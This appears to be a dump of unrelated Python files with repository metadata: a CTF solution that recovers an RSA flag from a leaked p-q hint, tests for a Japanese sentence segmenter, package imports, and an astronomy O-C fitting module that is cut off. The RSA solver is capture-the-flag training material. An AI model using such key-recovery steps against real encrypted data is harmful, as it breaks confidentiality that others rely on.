| 39.992278 | 146 | 0.652249 | 1,484 | 10,358 | 4.41442 | 0.17655 | 0.042742 | 0.032056 | 0.036941 | 0.880629 | 0.877576 | 0.874523 | 0.869028 | 0.863532 | 0.863532 | 0 | 0.019978 | 0.217127 | 10,358 | 258 | 147 | 40.147287 | 0.78789 | 0.328056 | 0 | 0.567797 | 0 | 0.008475 | 0.129903 | 0.009247 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042373 | false | 0.008475 | 0.033898 | 0 | 0.09322 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0693fd8a01b440c548bf2536b77d01d3b95da158 | 3,406 | py | Python | 2021_2022/Training_4/HintedRSA/solution.py | 0awawa0/DonNU_CTF | 7ff693fdba4609298f5556ea583fe604980d76e3 | [
"MIT"
] | null | null | null | 2021_2022/Training_4/HintedRSA/solution.py | 0awawa0/DonNU_CTF | 7ff693fdba4609298f5556ea583fe604980d76e3 | [
"MIT"
] | null | null | null | 2021_2022/Training_4/HintedRSA/solution.py | 0awawa0/DonNU_CTF | 7ff693fdba4609298f5556ea583fe604980d76e3 | [
"MIT"
] | null | null | null | from Crypto.Util.number import *
import math
e = 0x10001
n = 961445943888840215288522754445026510743473076689337403144333879593463986904364838586170835699906384781631370662475639324609992342202744355850521358342756784958571627256586576603747473312986793639711869303614648034309510362586032534553676611139684528340669137800132095540828987059037945826668054627229536701654799350190693339345773272684185950853726035582289056182952711528893421846450008777325825518751410357496204404638124992850696705297926925942843156249125267571732411616928549217068784261779096096116285770653408770412816712664990337620697198329515736340588923502218943033737818780630916504373625971629585365099608419665523139870152782000960802873800617483602090708260029548201486307388077222745140335031113084587060514626869798229561867450052261444604341286267726161542875461565719051806401057802593637597871730432878746248940478326738376188681495157789160173198368548918389993423034042982000430406946619608859317825006843594886289551548098171546894532838002331869549223361863251792070063165159443859273559193728045568032323867575542466285105706485187340015247513937186233153535342456246038871755650644332881502204306341873138389443855475270030618258630527202615235441291881951077160520297481033188742900514275391432363246564953
hint = 641167744111181547085698318848049827218611202952975380836404920734648147042569164578845679054520345179725998820497569101734143784972214855548118863772149865409322883301737334313506194806480286558215119628369186685004818260884436933579797143628928614089383326340995583270805705607705019753787859390550257106618572999144788422058693888990601688282495798350816569373743430401624935468867426546771066454036148566866193789737078102003829249471031847499913147940534322480431303615774271140856898567171939734089675322666015183135935549042775562209968532773537346411500071882711882681619923686098566531960758728136626351473
c = 394829496153226615079106845467776028366140295342347876510040454366361044598513881356450574623503480681255015968436969691951393558048412880463905121742431156051565692937669727273900950066509540982565422053463968010457097616902036770236581183869679426210320540792395066217390317300709663531949422444177368146146490400165500157782436434933232777495959326597493059454967527212485176581857254955923786937274115250081553847466264173157144568090315577326717838927510944185666938055684082409086247191917904923872982647814928313365157444331282503927018395361965287602364461132931608856111284092368985337210080787574611707884767727233786809687914173554665342434128666744768281530778129813443424112316349497034849892546233762211320003738980010791628941095440130956466412986267244043634258014478584920306306760563851795725646316495957472124535287163443297948654638053816084809517981349651550833453213804078846493192519304479047589197564446335434607426688649741459861332554359842892770299199242653988650692814695370219260616932781666464355751249300729614798286334219273128642356612262798872107993509667710065537291251345498592539451641320735486139103181843064733191243637002061733376567254295975945106413969502225896685709871388884681785343334722
t = math.isqrt((hint - 1) ** 2 + 4 * n)
p1 = (hint - 1 + t) // 2
p2 = (hint - 1 - t) // 2
p = p2 if p1 < 0 else p1  # pick the positive root
q = n // p
assert p * q == n
f = (p - 1) * (q - 1)
d = pow(e, -1, f)
flag = pow(c, d, n)
print(long_to_bytes(flag)) | 131 | 1,237 | 0.951262 | 70 | 3,406 | 46.257143 | 0.5 | 0.004632 | 0.003706 | 0.004324 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.938615 | 0.029066 | 3,406 | 26 | 1,238 | 131 | 0.04052 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002055 | 0 | 0.05 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.05 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
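The recovery step works because the hint apparently encodes p - q: with s = hint - 1, we get s^2 + 4n = (p - q)^2 + 4pq = (p + q)^2, so p = (s + isqrt(s^2 + 4n)) // 2. A toy check with small stand-in primes (illustrative values, not from the challenge):

```python
import math

# Toy primes standing in for the real RSA factors (illustrative only)
p, q = 1009, 883
n = p * q
hint = p - q + 1                  # same relation the solver assumes

s = hint - 1                      # s = p - q
t = math.isqrt(s * s + 4 * n)     # t = p + q, since s^2 + 4pq = (p + q)^2
p_rec = (s + t) // 2
q_rec = n // p_rec
print(p_rec, q_rec)               # 1009 883
```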
23002fc988959e7c3403bed99ad88400b09bf097 | 173 | py | Python | src/drem/download/download.py | oisindoherty3/drem | 478fe4e72fd38628f4ddc3745c16efe75ee98e4d | [
"MIT"
] | 4 | 2020-07-21T12:18:53.000Z | 2020-11-19T12:30:56.000Z | src/drem/download/download.py | oisindoherty3/drem | 478fe4e72fd38628f4ddc3745c16efe75ee98e4d | [
"MIT"
] | 101 | 2020-08-20T16:29:44.000Z | 2021-01-13T12:41:53.000Z | src/drem/download/download.py | oisindoherty3/drem | 478fe4e72fd38628f4ddc3745c16efe75ee98e4d | [
"MIT"
] | 5 | 2020-07-31T11:51:30.000Z | 2020-10-14T10:25:39.000Z | # flake8: noqa
from drem.download.ber_publicsearch import DownloadBERPublicsearch as BERPublicsearch
from drem.download.vo import DownloadValuationOffice as ValuationOffice
| 43.25 | 85 | 0.878613 | 19 | 173 | 7.947368 | 0.736842 | 0.10596 | 0.211921 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006329 | 0.086705 | 173 | 3 | 86 | 57.666667 | 0.949367 | 0.069364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2308f83fc0c3a0f50b7d057911070c231db43a9c | 5,981 | py | Python | tests/common/test_pipeline.py | wwwcojp/ja_sentence_segmenter | 282661a059bbed3daecda6487462a4715501e832 | [
"MIT"
] | 43 | 2019-12-15T23:40:17.000Z | 2022-03-01T11:46:01.000Z | tests/common/test_pipeline.py | wwwcojp/ja_sentence_segmenter | 282661a059bbed3daecda6487462a4715501e832 | [
"MIT"
] | 1 | 2019-12-31T01:41:12.000Z | 2020-02-22T16:13:04.000Z | tests/common/test_pipeline.py | wwwcojp/ja_sentence_segmenter | 282661a059bbed3daecda6487462a4715501e832 | [
"MIT"
] | 1 | 2022-02-25T13:22:23.000Z | 2022-02-25T13:22:23.000Z | """PragmaticSegmenterと同等の処理が可能かチェック.
参考:https://github.com/diasks2/pragmatic_segmenter/blob/master/spec/pragmatic_segmenter/languages/japanese_spec.rb
"""
import functools
import pytest
from ja_sentence_segmenter.common.pipeline import make_pipeline
from ja_sentence_segmenter.concatenate.simple_concatenator import concatenate_matching
from ja_sentence_segmenter.normalize.neologd_normalizer import normalize
from ja_sentence_segmenter.split.simple_splitter import split_newline, split_punctuation
def test_pipeline() -> None:
split_punc2 = functools.partial(split_punctuation, punctuations=r"。!?")
concat_tail_no = functools.partial(concatenate_matching, former_matching_rule=r"^(?P<result>.+)(の)$", remove_former_matched=False)
segmenter = make_pipeline(normalize, split_newline, concat_tail_no, split_punc2)
# Golden Rule: Simple period to end sentence #001
text1 = "これはペンです。それはマーカーです。"
assert list(segmenter(text1)) == ["これはペンです。", "それはマーカーです。"]
# Golden Rule: Question mark to end sentence #002
text2 = "それは何ですか?ペンですか?"
assert list(segmenter(text2)) == ["それは何ですか?", "ペンですか?"]
# Golden Rule: Exclamation point to end sentence #003
text3 = "良かったね!すごい!"
assert list(segmenter(text3)) == ["良かったね!", "すごい!"]
# Golden Rule: Quotation #004
text4 = "自民党税制調査会の幹部は、「引き下げ幅は3.29%以上を目指すことになる」と指摘していて、今後、公明党と合意したうえで、30日に決定する与党税制改正大綱に盛り込むことにしています。2%台後半を目指すとする方向で最終調整に入りました。"
assert list(segmenter(text4)) == [
"自民党税制調査会の幹部は、「引き下げ幅は3.29%以上を目指すことになる」と指摘していて、今後、公明党と合意したうえで、30日に決定する与党税制改正大綱に盛り込むことにしています。",
"2%台後半を目指すとする方向で最終調整に入りました。",
]
# Golden Rule: Errant newlines in the middle of sentences #005
text5 = "これは父の\n家です。"
assert list(segmenter(text5)) == ["これは父の家です。"]
# segment: correctly segments text #001
text6 = "これは山です \nこれは山です \nこれは山です(「これは山です」) \nこれは山です(これは山です「これは山です」)これは山です・これは山です、これは山です。 \nこれは山です(これは山です。これは山です)。これは山です、これは山です、これは山です、これは山です(これは山です。これは山です)これは山です、これは山です、これは山です「これは山です」これは山です(これは山です:0円)これは山です。 \n1.)これは山です、これは山です(これは山です、これは山です6円(※1))これは山です。 \n※1 これは山です。 \n2.)これは山です、これは山です、これは山です、これは山です。 \n3.)これは山です、これは山です・これは山です、これは山です、これは山です、これは山です(これは山です「これは山です」)これは山です、これは山です、これは山です、これは山です。 \n4.)これは山です、これは山です(これは山です、これは山です、これは山です。これは山です)これは山です、これは山です(これは山です、これは山です)。 \nこれは山です、これは山です、これは山です、これは山です、これは山です(者)これは山です。 \n(1) 「これは山です」(これは山です:0円) (※1) \n① これは山です"
assert list(segmenter(text6)) == [
"これは山です",
"これは山です",
"これは山です(「これは山です」)",
"これは山です(これは山です「これは山です」)これは山です・これは山です、これは山です。",
"これは山です(これは山です。これは山です)。",
"これは山です、これは山です、これは山です、これは山です(これは山です。これは山です)これは山です、これは山です、これは山です「これは山です」これは山です(これは山です:0円)これは山です。",
"1.)これは山です、これは山です(これは山です、これは山です6円(※1))これは山です。",
"※1これは山です。",
"2.)これは山です、これは山です、これは山です、これは山です。",
"3.)これは山です、これは山です・これは山です、これは山です、これは山です、これは山です(これは山です「これは山です」)これは山です、これは山です、これは山です、これは山です。",
"4.)これは山です、これは山です(これは山です、これは山です、これは山です。これは山です)これは山です、これは山です(これは山です、これは山です)。",
"これは山です、これは山です、これは山です、これは山です、これは山です(者)これは山です。",
"(1)「これは山です」(これは山です:0円)(※1)",
"① これは山です",
]
# segment: correctly segments text #002
text7 = "フフーの\n主たる債務"
assert list(segmenter(text7)) == ["フフーの主たる債務"]
# segment: correctly segments text #003
    # Pragmatic Segmenter works quite hard on handling periods, so this case could not be reproduced...
# text8 = "これは山です \nこれは山です \nこれは山です(「これは山です」) \nこれは山です(これは山です「これは山です」)これは山です・これは山です、これは山です. \nこれは山です(これは山です.これは山です).これは山です、これは山です、これは山です、これは山です(これは山です.これは山です)これは山です、これは山です、これは山です「これは山です」これは山です(これは山です:0円)これは山です. \n1.)これは山です、これは山です(これは山です、これは山です6円(※1))これは山です. \n※1 これは山です. \n2.)これは山です、これは山です、これは山です、これは山です. \n3.)これは山です、これは山です・これは山です、これは山です、これは山です、これは山です(これは山です「これは山です」)これは山です、これは山です、これは山です、これは山です. \n4.)これは山です、これは山です(これは山です、これは山です、これは山です.これは山です)これは山です、これは山です(これは山です、これは山です). \nこれは山です、これは山です、これは山です、これは山です、これは山です(者)これは山です. \n(1) 「これは山です」(これは山です:0円) (※1) \n① これは山です"
# assert list(segmenter(text8)) == [
# "これは山です",
# "これは山です",
# "これは山です(「これは山です」)",
# "これは山です(これは山です「これは山です」)これは山です・これは山です、これは山です.",
# "これは山です(これは山です.これは山です).",
# "これは山です、これは山です、これは山です、これは山です(これは山です.これは山です)これは山です、これは山です、これは山です「これは山です」これは山です(これは山です:0円)これは山です.",
# "1.)これは山です、これは山です(これは山です、これは山です6円(※1))これは山です.",
# "※1これは山です.",
# "2.)これは山です、これは山です、これは山です、これは山です.",
# "3.)これは山です、これは山です・これは山です、これは山です、これは山です、これは山です(これは山です「これは山です」)これは山です、これは山です、これは山です、これは山です.",
# "4.)これは山です、これは山です(これは山です、これは山です、これは山です.これは山です)これは山です、これは山です(これは山です、これは山です).",
# "これは山です、これは山です、これは山です、これは山です、これは山です(者)これは山です.",
# "(1)「これは山です」(これは山です:0円)(※1)",
# "① これは山です",
# ]
# segment: correctly segments text #004
text9 = "これは山です \nこれは山です \nこれは山です(「これは山です」) \nこれは山です(これは山です「これは山です」)これは山です・これは山です、これは山です! \nこれは山です(これは山です!これは山です)!これは山です、これは山です、これは山です、これは山です(これは山です!これは山です)これは山です、これは山です、これは山です「これは山です」これは山です(これは山です:0円)これは山です! \n1.)これは山です、これは山です(これは山です、これは山です6円(※1))これは山です! \n※1 これは山です! \n2.)これは山です、これは山です、これは山です、これは山です! \n3.)これは山です、これは山です・これは山です、これは山です、これは山です、これは山です(これは山です「これは山です」)これは山です、これは山です、これは山です、これは山です! \n4.)これは山です、これは山です(これは山です、これは山です、これは山です!これは山です)これは山です、これは山です(これは山です、これは山です)! \nこれは山です、これは山です、これは山です、これは山です、これは山です(者)これは山です! \n(1) 「これは山です」(これは山です:0円) (※1) \n① これは山です"
assert list(segmenter(text9)) == [
"これは山です",
"これは山です",
"これは山です(「これは山です」)",
"これは山です(これは山です「これは山です」)これは山です・これは山です、これは山です!",
"これは山です(これは山です!これは山です)!",
"これは山です、これは山です、これは山です、これは山です(これは山です!これは山です)これは山です、これは山です、これは山です「これは山です」これは山です(これは山です:0円)これは山です!",
"1.)これは山です、これは山です(これは山です、これは山です6円(※1))これは山です!",
"※1これは山です!",
"2.)これは山です、これは山です、これは山です、これは山です!",
"3.)これは山です、これは山です・これは山です、これは山です、これは山です、これは山です(これは山です「これは山です」)これは山です、これは山です、これは山です、これは山です!",
"4.)これは山です、これは山です(これは山です、これは山です、これは山です!これは山です)これは山です、これは山です(これは山です、これは山です)!",
"これは山です、これは山です、これは山です、これは山です、これは山です(者)これは山です!",
"(1)「これは山です」(これは山です:0円)(※1)",
"① これは山です",
]
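The tests above chain generator stages built with `functools.partial` into one segmenter. A minimal stand-in (not the library's actual implementation) showing how such a pipeline composes:

```python
import functools

def split_punctuation(texts, punctuations="。!?"):
    # Yield sentences, keeping the terminating punctuation mark
    for text in texts:
        buf = ""
        for ch in text:
            buf += ch
            if ch in punctuations:
                yield buf
                buf = ""
        if buf:
            yield buf

def make_pipeline(*funcs):
    # Compose generator stages left to right (sketch of the library helper)
    def segmenter(text):
        stream = [text]
        for f in funcs:
            stream = f(stream)
        return stream
    return segmenter

split_punc2 = functools.partial(split_punctuation, punctuations="。!?")
segmenter = make_pipeline(split_punc2)
print(list(segmenter("これはペンです。それはマーカーです。")))
# ['これはペンです。', 'それはマーカーです。']
```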
| 56.424528 | 566 | 0.69888 | 754 | 5,981 | 5.543767 | 0.171088 | 0.835407 | 1.020574 | 1.136842 | 0.695455 | 0.695455 | 0.695455 | 0.695455 | 0.695455 | 0.695455 | 0 | 0.025492 | 0.134258 | 5,981 | 105 | 567 | 56.961905 | 0.775396 | 0.301622 | 0 | 0.169492 | 0 | 0.135593 | 0.604595 | 0.501088 | 0 | 0 | 0 | 0 | 0.135593 | 1 | 0.016949 | false | 0 | 0.101695 | 0 | 0.118644 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2335df1c8a4c83d214e26d98a18fb495f1c55a1e | 194 | py | Python | engine/omega_engine/core/utils/camera/__init__.py | jadsonlucio/Opengl-CG-Project | 47b50bf93b8d3a1ccef1f41f22ed3327d9496b8c | [
"MIT"
] | null | null | null | engine/omega_engine/core/utils/camera/__init__.py | jadsonlucio/Opengl-CG-Project | 47b50bf93b8d3a1ccef1f41f22ed3327d9496b8c | [
"MIT"
] | 3 | 2021-06-08T20:54:18.000Z | 2022-03-12T00:13:46.000Z | engine/omega_engine/core/utils/camera/__init__.py | jadsonlucio/Opengl-CG-Project | 47b50bf93b8d3a1ccef1f41f22ed3327d9496b8c | [
"MIT"
] | null | null | null | from .camera import Camera
from .camera_3rd_person import Camera3RDPerson
from .camera_airplane import CameraAirPlane
from .camera_viewup import ViewUpCamera
from .multi_camera import MultCamera | 38.8 | 46 | 0.876289 | 25 | 194 | 6.6 | 0.48 | 0.242424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011429 | 0.097938 | 194 | 5 | 47 | 38.8 | 0.931429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2379f636e97f2f8941b5bc550928dd9f4a81fc33 | 54 | py | Python | src/jsdtools/dot/__init__.py | gulan/jsdtools | 1707f7c1571dcde6eac456caadb625f691a16bba | [
"0BSD"
] | null | null | null | src/jsdtools/dot/__init__.py | gulan/jsdtools | 1707f7c1571dcde6eac456caadb625f691a16bba | [
"0BSD"
] | 4 | 2018-09-04T14:40:24.000Z | 2018-09-04T19:36:27.000Z | src/jsdtools/dot/__init__.py | gulan/jsdtools | 1707f7c1571dcde6eac456caadb625f691a16bba | [
"0BSD"
] | null | null | null | #!python
from .render import (print_one, print_many)
| 13.5 | 43 | 0.759259 | 8 | 54 | 4.875 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12963 | 54 | 3 | 44 | 18 | 0.829787 | 0.12963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
0013ff889501f1a2bd5ba07d6c8de316de350bc2 | 117,441 | py | Python | py2/OCFit/OC_class.py | pavolgaj/OCF | 8df25bf69f63e4b4385ed5554c458b1da4281823 | [
"MIT"
] | 3 | 2017-11-23T10:21:03.000Z | 2019-05-29T16:18:13.000Z | py2/OCFit/OC_class.py | pavolgaj/OCF | 8df25bf69f63e4b4385ed5554c458b1da4281823 | [
"MIT"
] | 7 | 2018-12-05T08:21:37.000Z | 2021-06-21T16:07:46.000Z | py2/OCFit/OC_class.py | pavolgaj/OCF | 8df25bf69f63e4b4385ed5554c458b1da4281823 | [
"MIT"
] | 3 | 2019-02-18T12:32:26.000Z | 2021-12-01T14:06:54.000Z | # -*- coding: utf-8 -*-
#main classes of OCFit package
#version 0.1.6
#update: 7.10.2021
# (c) Pavol Gajdos, 2018-2021
from time import time
import sys
import os
import threading
import warnings
import pickle
#import matplotlib
try:
    import matplotlib.pyplot as mpl
    fig=mpl.figure()
    mpl.close(fig)
except:
    #import on server without graphic output
    try: mpl.switch_backend('Agg')
    except:
        import matplotlib
        reload(matplotlib)   #builtin reload (Python 2)
        matplotlib.use('Agg',force=True)
        import matplotlib.pyplot as mpl
from matplotlib import gridspec
mpl.style.use('classic')
import numpy as np
try: import pymc
except: warnings.warn('Module pymc not found! Using FitMC will not be possible!')
from .ga import TPopul
from .info_ga import InfoGA as InfoGAClass
from .info_mc import InfoMC as InfoMCClass
#some constants
AU=149597870700 #astronomical unit in meters
c=299792458 #velocity of light in meters per second
day=86400. #number of seconds in day
minutes=1440. #number of minutes in day
def GetMax(x,n):
    '''return indices of the n largest values in array x'''
    temp=[]
    x=np.array(x)   #copy, so the caller's array is not modified
    for i in range(n):
        temp.append(np.argmax(x))
        x[temp[-1]]=0
    return np.array(temp)
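`GetMax` can be exercised on its own; a self-contained sketch of the same zero-out-the-argmax idea (it only makes sense for positive values, as with the |O-C| residuals it is applied to):

```python
import numpy as np

def get_max(x, n):
    # Indices of the n largest entries, found by zeroing each argmax in turn
    # (assumes positive entries, e.g. absolute residuals)
    temp = []
    x = np.array(x, dtype=float)   # copy, so the caller's array is untouched
    for _ in range(n):
        temp.append(np.argmax(x))
        x[temp[-1]] = 0
    return np.array(temp)

print(get_max([1.0, 5.0, 3.0, 4.0], 2))  # [1 3]
```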
class SimpleFit():
'''class with common function for FitLinear and FitQuad'''
def __init__(self,t,t0,P,oc=None,err=None):
'''input: observed time, time of zeros epoch, period, (O-C values, errors)'''
self.t=np.array(t) #times
#linear ephemeris of binary
self.P=P
self.t0=t0
self._t0P=[t0,P] #given linear ephemeris of binary
if oc is None:
#calculate O-C
self.Epoch()
tC=t0+P*self.epoch
self.oc=self.t-tC
else: self.oc=np.array(oc)
if err is None:
#errors not given
self.err=np.ones(self.t.shape)
self._set_err=False
else:
#errors given
self.err=np.array(err)
self._set_err=True
self._corr_err=False
self._calc_err=False
self._old_err=[]
#sorting data...
self._order=np.argsort(self.t)
self.t=self.t[self._order] #times
self.oc=self.oc[self._order] #O-Cs
self.err=self.err[self._order] #errors
self.Epoch()
self.params={} #values of parameters
self.params_err={} #errors of fitted parameters
self.model=[] #model O-C
self.new_oc=[] #new O-C (residue)
self.chi=0
self._robust=False
self._mcmc=False
self.tC=[]
def Epoch(self):
'''calculate epoch'''
self.epoch=np.round((self.t-self.t0)/self.P*2)/2.
return self.epoch
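`Epoch` rounds to the nearest half epoch, so secondary minima land on half-integer epochs. A worked numeric check with illustrative ephemeris values:

```python
import numpy as np

P, t0 = 2.5, 2450000.0                    # illustrative period and zero epoch
t = np.array([2450005.02, 2450006.24])    # near epoch 2.0 and epoch 2.5

# Same rounding-to-half-epochs as SimpleFit.Epoch
epoch = np.round((t - t0) / P * 2) / 2.
print(epoch)  # [2.  2.5]
```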
def PhaseCurve(self,P,t0,plot=False):
'''create phase curve'''
f=np.mod(self.t-t0,P)/float(P) #phase
order=np.argsort(f)
f=f[order]
oc=self.oc[order]
if plot:
mpl.figure()
if self._set_err: mpl.errorbar(f,oc,yerr=self.err,fmt='o')
else: mpl.plot(f,oc,'.')
return f,oc
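The phase folding in `PhaseCurve` is just `np.mod(t - t0, P) / P`. A small numeric example with illustrative times:

```python
import numpy as np

# Fold a few times on a 2.5 d period (illustrative numbers)
P, t0 = 2.5, 2450000.0
t = np.array([2450000.5, 2450003.75, 2450006.25])

phase = np.mod(t - t0, P) / P
print(phase)  # [0.2 0.5 0.5]
```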
def Summary(self,name=None):
'''parameters summary, writting to file "name"'''
params=self.params.keys()
units={'t0':'JD','P':'d','Q':'d'}
text=['parameter'.ljust(15,' ')+'unit'.ljust(10,' ')+'value'.ljust(30,' ')+'error']
for p in sorted(params):
text.append(p.ljust(15,' ')+units[p].ljust(10,' ')+str(self.params[p]).ljust(30,' ')
+str(self.params_err[p]).ljust(20,' '))
text.append('')
if self._robust: text.append('Fitting method: Robust regression')
elif self._mcmc: text.append('Fitting method: MCMC')
else: text.append('Fitting method: Standard regression')
g=len(params)
n=len(self.t)
text.append('chi2 = '+str(self.chi))
if n-g>0: text.append('chi2_r = '+str(self.chi/(n-g)))
else: text.append('chi2_r = NA')
text.append('AIC = '+str(self.chi+2*g))
if n-g-1>0: text.append('AICc = '+str(self.chi+2*g*n/(n-g-1)))
else: text.append('AICc = NA')
text.append('BIC = '+str(self.chi+g*np.log(n)))
if name is None:
print '------------------------------------'
for t in text: print t
print '------------------------------------'
else:
f=open(name,'w')
for t in text: f.write(t+'\n')
f.close()
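The information criteria reported by `Summary` follow directly from chi^2, the number of data points n, and the number of fitted parameters g. A worked example with toy numbers:

```python
import numpy as np

# Toy numbers: 20 points, 2 fitted parameters, chi^2 = 25 (illustrative)
n, g, chi2 = 20, 2, 25.0

aic = chi2 + 2 * g
aicc = chi2 + 2 * g * n / (n - g - 1)   # same (algebraically equivalent) AICc form as Summary()
bic = chi2 + g * np.log(n)
print(round(aic, 3), round(aicc, 3), round(bic, 3))  # 29.0 29.706 30.991
```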
def InfoMCMC(self,db,eps=False,geweke=False):
'''statistics about GA fitting'''
info=InfoMCClass(db)
info.AllParams(eps)
for p in info.pars: info.OneParam(p,eps)
if geweke: info.Geweke(eps)
def CalcErr(self):
'''calculate errors according to current model'''
n=len(self.model)
err=np.sqrt(sum((self.oc-self.model)**2)/(n*(n-1)))
errors=err*np.ones(self.model.shape)*np.sqrt(n-len(self.params))
chi=sum(((self.oc-self.model)/errors)**2)
print 'New chi2:',chi,chi/(n-len(self.params))
self._calc_err=True
self._set_err=False
self.err=errors
return errors
def CorrectErr(self):
'''scaling errors according to current model'''
n=len(self.model)
chi0=sum(((self.oc-self.model)/self.err)**2)
alfa=chi0/(n-2)
err=self.err*np.sqrt(alfa)
chi=sum(((self.oc-self.model)/err)**2)
print 'New chi2:',chi,chi/(n-len(self.params))
if self._set_err and len(self._old_err)==0: self._old_err=self.err
self.err=err
self._corr_err=True
        return err
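`CorrectErr` rescales the errors by sqrt(chi^2/(n - 2)) so the reduced chi^2 of the current model becomes one. A small numeric sketch of the same scaling:

```python
import numpy as np

# Rescale errors so the reduced chi^2 of the current model becomes ~1
oc = np.array([0.010, -0.012, 0.008, -0.009])   # illustrative O-C values
model = np.zeros(4)                              # trivial model for the sketch
err = np.full(4, 0.005)

chi0 = np.sum(((oc - model) / err) ** 2)
alfa = chi0 / (len(oc) - 2)              # same scale factor CorrectErr uses
err_new = err * np.sqrt(alfa)
chi_new = np.sum(((oc - model) / err_new) ** 2)
print(round(chi_new / (len(oc) - 2), 6))  # 1.0
```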
def AddWeight(self,weight):
'''adding weight to data + scaling according to current model
        warning: weights have to be in same order as input data!
'''
if not len(weight)==len(self.t):
print 'incorrect length of "w"!'
return
weight=np.array(weight)[self._order]
err=1./weight
n=len(self.t)
chi0=sum(((self.oc-self.model)/err)**2)
alfa=chi0/(n-len(self.params))
err*=np.sqrt(alfa)
chi=sum(((self.oc-self.model)/err)**2)
print 'New chi2:',chi,chi/(n-len(self.params))
self._calc_err=True
self._set_err=False
self.err=err
return err
def SaveOC(self,name,weight=None):
'''saving O-C calculated from given ephemeris to file
name - name of file
weight - weight of data
    warning: weights have to be in same order as input data!
'''
f=open(name,'w')
if weight is not None:
np.savetxt(f,np.column_stack((self.t,self.epoch,self.oc,np.array(weight)[self._order])),
fmt=["%14.7f",'%10.3f',"%+12.10f","%.10f"],delimiter=" ",
header='Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'O-C'.ljust(12,' ')+' '+'Weight')
elif self._set_err:
if self._corr_err: err=self._old_err
else: err=self.err
np.savetxt(f,np.column_stack((self.t,self.epoch,self.oc,err)),
fmt=["%14.7f",'%10.3f',"%+12.10f","%.10f"],delimiter=" ",
header='Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'O-C'.ljust(12,' ')+' '+'Error')
else:
np.savetxt(f,np.column_stack((self.t,self.epoch,self.oc)),
fmt=["%14.7f",'%10.3f',"%+12.10f"],delimiter=" ",
header='Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'O-C')
f.close()
def SaveRes(self,name,weight=None):
'''saving residue (new O-C) to file
name - name of file
weight - weight of data
    warning: weights have to be in same order as input data!
'''
f=open(name,'w')
if self._set_err:
if self._corr_err: err=self._old_err
else: err=self.err
np.savetxt(f,np.column_stack((self.t,self.epoch,self.new_oc,err)),
fmt=["%14.7f",'%10.3f',"%+12.10f","%.10f"],delimiter=" ",
header='Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'new O-C'.ljust(12,' ')+' Error')
elif weight is not None:
np.savetxt(f,np.column_stack((self.t,self.epoch,self.new_oc,np.array(weight)[self._order])),
fmt=["%14.7f",'%10.3f',"%+12.10f","%.10f"],delimiter=" ",
header='Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'new O-C'.ljust(12,' ')+' Weight')
else:
np.savetxt(f,np.column_stack((self.t,self.epoch,self.new_oc)),
fmt=["%14.7f",'%10.3f',"%+12.10f"],delimiter=" ",
header='Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' new O-C')
f.close()
def PlotRes(self,name=None,no_plot=0,no_plot_err=0,eps=False,oc_min=True,
time_type='JD',offset=2400000,trans=True,title=None,epoch=False,
min_type=False,weight=None,trans_weight=False,bw=False,double_ax=False,
fig_size=None):
'''plotting residue (new O-C)
name - name of file to saving plot (if not given -> show graph)
        no_plot - number of outlier points that will not be plotted
        no_plot_err - number of points with the largest errors that will not be plotted
eps - save also as eps file
oc_min - O-C in minutes (if False - days)
time_type - type of JD in which is time (show in x label)
offset - offset of time
trans - transform time according to offset
title - name of graph
epoch - x axis in epoch
min_type - distinction of type of minimum
